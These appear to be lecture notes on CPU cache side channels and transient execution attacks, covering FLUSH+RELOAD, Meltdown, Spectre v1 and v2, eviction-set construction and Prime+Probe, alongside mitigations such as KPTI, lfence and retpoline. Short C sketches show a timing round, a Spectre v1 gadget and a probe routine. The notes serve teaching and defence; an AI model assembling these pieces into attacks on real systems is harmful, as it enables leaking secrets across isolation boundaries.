+++
title = 'CPUs'
+++

# CPUs

## CPU caches
Caches: add fast-path access to memory
- shared across programs, like memory
- great for performance, bad for security

Basic RELOAD attack: you can determine which function is being executed using a timing side channel -- a function that was already executed will be in the cache, so it is faster to access.

Important properties:
- size: three levels, with L1 the smallest and L3 the largest (shared across all cores)
- inclusivity: a line in level X is also in level X+1

Addressing:
- caches are divided into sets; each address can only go to its own set
- cache line lookup on memory access:
  - if present: hit. if not: miss → fill it in
  - if the set is full: replace a line
  - replacement policy: most often least recently used (LRU)
  - reverse engineering the policy:
    - implement a simulator for textbook replacement policies
    - run the same accesses through the simulator and the real cache
    - compare hits and misses to find the best policy match
- indexing: policy to select the target cache set given a memory address
- tagging: how to select the cache line within a cache set given a memory address
- practical implementations use the physical address to identify the cache line in a set (tag)
  - virtual addresses have problems: e.g. multiple virtual addresses map to a single physical address, or vice versa
- L1: VIPT (virtual index, physical tag), 64 sets, 8 ways. bits 6-11 decide the set, shared between the virtual and physical page
- L2: PIPT, 1024 sets, 4 ways. bits 6-15 decide the set
- L3: sliced PIPT, 2048 sets per slice, 16 ways. bits 6-16 decide the set
  - L3 is partitioned into slices, one per core, accessed via a ring bus

## Timing cache attack
Threat model:
- control of victim: measurement is synchronous, but assumes we can control and time when the victim executes
- no control: fewer assumptions on the attacker, but measurement is asynchronous

Flushing the cache: `clflush` (x86)
- flushes a given memory location from the entire cache hierarchy
- if the attacker has no access to the target memory location, a more sophisticated cache eviction strategy is needed

Observing cache activity: FLUSH+RELOAD
- threat model: victim and attacker share the target code/data
- the attacker selectively flushes a shared location from the cache, then later reloads it
- by measuring the access time, the attacker can tell whether the victim accessed the address in between (see the sketch below)
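A minimal sketch of one FLUSH+RELOAD round, assuming x86-64 with GCC/Clang intrinsics; the names `target`, `time_load`, `flush_reload_round` and `THRESHOLD_CYCLES` are illustrative, and the threshold must be calibrated per machine:

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Hypothetical hit/miss cutoff in cycles; calibrate per machine. */
#define THRESHOLD_CYCLES 120

/* Time a single load of *addr in cycles. */
static uint64_t time_load(volatile uint8_t *addr) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                         /* the reload */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

/* One round: returns 1 if the victim touched `target` since the flush. */
static int flush_reload_round(volatile uint8_t *target) {
    _mm_clflush((const void *)target);   /* flush from the whole hierarchy */
    _mm_mfence();                        /* ensure the flush is done first */
    /* ... let the victim run here ... */
    return time_load(target) < THRESHOLD_CYCLES;  /* fast => cached => accessed */
}
```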
## Cache attacks on hardware - out-of-order execution
for FLUSH+RELOAD, the victim hardware unit must:
- use the cache
- share memory with attacker-controlled software
- access secrets

covert channel: both parties are controlled by the attacker

Rogue Data Cache Load (Meltdown): a FLUSH+RELOAD attack
- a user process accesses a kernel memory location
- the MMU raises an exception and the page fault handler kills the process
- but out-of-order execution (OoOE) has already read the secret and filled a cache line
- the reload 'sees' the filled cache line in the timing difference
- avoiding termination: transactional memory (TSX) suppresses exceptions, so use that
- reducing noise: the prefetcher in OoOE may fill extra cache lines, but usually doesn't operate across pages. also randomize the access order during the reload step

Mitigating Meltdown:
- KPTI: kernel page table isolation. don't map the kernel into user space, only the small part needed to switch to kernel space
  - but very expensive -- better to fix in silicon

## Transient execution attacks
Branch prediction unit: avoids pipeline stalls using speculative execution
- pipeline stalls normally slow down execution
- speculative execution runs some instructions in a predicted branch, which may be rolled back
- the branch target buffer (BTB) stores source addresses and the history of the branch
- speculative execution can have many levels of nesting

After branch prediction:
- correct → retire after the branch instruction
- misprediction → discard the speculatively executed instructions
  - but this does not revert microarchitectural state

Spectre v1: bounds check bypass
- train the branch predictor at a given program location to take a specific branch
- flush the data that controls the branch
- give the target branch an input that makes it go the other way
- you need a gadget that accesses data out of bounds and transfers it into a variable (see the sketch below)
- generalizes Meltdown -- leak from any array offset
- exceptions can be suppressed by the branch misprediction itself (instead of TSX)
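The shape of such a gadget, as a minimal sketch following the public Spectre v1 PoCs (names like `array1`, `probe` and `victim` are illustrative):

```c
#include <stddef.h>
#include <stdint.h>

uint8_t array1[16];
size_t  array1_size = 16;
uint8_t probe[256 * 4096];   /* one 4 KB page per possible byte value;
                                page-sized stride sidesteps the prefetcher */
uint8_t temp;                /* keeps the probe load from being optimized out */

void victim(size_t idx) {
    /* The attacker first trains this branch in-bounds, flushes
       `array1_size` so the check resolves late, then passes an
       out-of-bounds idx pointing at a secret. */
    if (idx < array1_size) {             /* mispredicted bounds check */
        uint8_t secret = array1[idx];    /* speculative out-of-bounds read */
        temp &= probe[secret * 4096];    /* secret-dependent cache fill */
    }
}
/* The attacker then FLUSH+RELOADs each page of `probe`; the one that
   reloads fast reveals the secret byte. */
```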
Mitigations for Spectre v1:
- `lfence` stops speculation
  - but it serializes all loads in the pipeline, so it is costly: up to 2x overhead (though there are optimizations)
- other instructions also stop speculation, e.g. the instructions that toggle SMAP
- pointer/index masking on array accesses, so the index can't go out of bounds
  - requires manual annotations in the Linux kernel
- low-resolution timers (but attackers can find other timers, or amplify the signal by repeating)
- process-based site isolation (each website gets its own process)
  - assumes process isolation can't be breached

Spectre v2: branch target injection
- the branch target buffer stores call target predictions (in another partition)
- train the branch predictor for a certain path
- on a call in some other context, the trained branch target will be speculatively executed
- the attacker can train the predictor in their own address space
  - the victim then mispredicts in its address space and calls into an attacker-controlled address → ROP in speculative execution
- when e.g. the address spaces don't overlap, the attacker can't easily train a specific virtual address, but can still abuse collisions in the branch target buffer
  - the BTB uses only a few bits of the virtual address to select an entry

Mitigations for Spectre v2:
- Intel initially released a microcode update with instructions to partially flush the BTB
  - OS vendors did not adopt it
- Retpoline: compiler-based, turns indirect calls into returns, which are predicted with the Return Stack Buffer (RSB)
  - goal: redirect speculation to a safe landing pad
  - the `ret` predictor assumes we are returning to the first instruction after the last call, which here contains an infinite loop with an `lfence`
  - problems:
    - indirect calls no longer benefit from speculation, which is slow
    - on recent microarchitectures, if the RSB is empty, the predictor falls back to the BTB, enabling attacks
      - options: "stuff" the RSB with special entries, or use eIBRS (BTB partitioned across privilege levels & hyperthreads)

Other applications of transient/speculative execution:
- ExSpectre: craft a shadow `memcpy` -- one that transfers memory between addresses, but whose data flows are hidden in speculative execution
- BlindSide: BROP attack against the kernel, a buffer overflow without exceptions (suppressed by speculative execution)

## Advanced cache attacks
Limitations of FLUSH+RELOAD:
- needs access to the `clflush` instruction (not available from JavaScript or on ARM)
- needs shared memory, not available in e.g. in-kernel Spectre
- relies on timing, not available in e.g. a sandbox forbidding access to timers
- causes cache misses on victim execution

Eviction-based attacks:
- goal: no `clflush` and no shared memory
- monitor cache sets instead of cache lines; use 1 eviction set to monitor 1 victim cache set
- eviction set: given a target cache set, a set of memory addresses that, when accessed, evict any other entry in that set

Building eviction sets for L1:
- 1 eviction set for each cache set in L1
- build eviction sets for all cache sets → can monitor all of L1 for victim accesses
- 64 sets: within a 4KB page we have 64 cache lines, each belonging to a different cache set ('color')
- 8 ways: we need 8 4KB pages, and accessing the first cache line of each of these pages fills an entire cache set of one color

Building an eviction set for L2:
1. Allocate a large pool of pages (large enough to cover all cache sets and ways of the target cache).
2. Pick a page P from the pool.
3. Check that accessing the first cache line of all other pages evicts the first cache line of P.
4. Pick a page Q and test whether the pool without Q still evicts P. If yes, remove Q from the pool.
5. Keep removing pages until the pool has exactly 4 members (one per way, since L2 is 4-way). This is an eviction set for P.
6. Try this again with a page that the eviction set for P does not evict, to find another eviction set.

In L1 and L2, cache sets are striped predictably throughout memory.
But because L3 is sliced, the distribution is chaotic.
However, the same eviction set algorithm also works for L3, because it makes no assumptions about physical addresses.

Prime+probe attack:
- the attacker does not control the victim; code/data are not shared
- steps (the probe step is sketched at the end of this section):
  1. Prime: build L3 eviction sets for the victim locations. Walk all eviction sets corresponding to the cache sets the attacker wants to monitor. This puts the cache in a known state.
  2. The victim accesses a cache set.
  3. Probe: walk the eviction set again and time it. If it is slow, the attacker knows the cache set was accessed.

Evict+time:
- the attacker controls the victim; code/data are not shared
- less noisy -- we can control the execution of the victim
- steps:
  1. Build L3 eviction sets for the victim locations. Walk all eviction sets corresponding to the cache sets the attacker wants to monitor.
  2. Craft input to an interface (e.g. RPC) to talk to the victim and trigger an execution that performs secret-dependent computation.
  3. Time the execution of the victim under attacker control; if it is slow, the victim accessed the cache set.
- as an attack against the MMU: trigger page table walks by the MMU and time the accesses
  - the MMU accesses the CPU caches because address translation is frequent and costly
  - AnC needs to trigger victim page table walks, so it must at least flush the TLB (evict TLB entries using eviction sets)
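A minimal sketch of the probe step, assuming an eviction set has already been built with the reduction algorithm above; `evset`, `probe_set` and `SLOW_THRESHOLD` are illustrative names, and the threshold is machine-specific:

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp */

/* Hypothetical cutoff for "the walk hit a miss"; calibrate per machine. */
#define SLOW_THRESHOLD 600

/* `evset` holds `ways` addresses that all map to the monitored cache set.
   Returns 1 if the victim touched the set: a victim access evicted one of
   our lines, so the walk incurs a miss and runs slow. */
static int probe_set(volatile uint8_t *const *evset, int ways) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    for (int i = 0; i < ways; i++)
        (void)*evset[i];                 /* touch every line in the set */
    uint64_t end = __rdtscp(&aux);
    return (end - start) > SLOW_THRESHOLD;
}
```

Note that walking the set both measures and refills it, so the probe of one round can double as the prime of the next.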